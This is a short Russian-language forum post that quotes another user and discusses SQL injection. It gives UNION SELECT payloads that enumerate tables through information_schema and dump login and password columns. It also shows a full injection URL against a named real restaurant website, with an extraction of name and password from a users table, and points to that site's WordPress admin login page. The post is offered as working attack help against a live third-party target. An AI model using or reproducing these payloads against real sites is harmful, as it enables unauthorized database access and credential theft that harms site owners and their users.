17.02.2011, 16:34
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Seravin
если я правильно понимаю, то:
1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+inf ormation_schema.tables+where+table_schema='имя базы'
2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+fro m+database_name.table_name
это подействует в случае когда конкретно уже знаем какие таблици в базе и поля, знаю что точно есть другая база, как можно с одной просмотреть какие есть таблици и поля в другой базе, для примера:
_http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,concat_ws(0x3b,version(),database (),user()),3,4,concat_ws(0x3a,name,password)+from+ users--
а админка на WP:
_http://www.indiagatebkk.com/blog/wp-login.php
|
|
|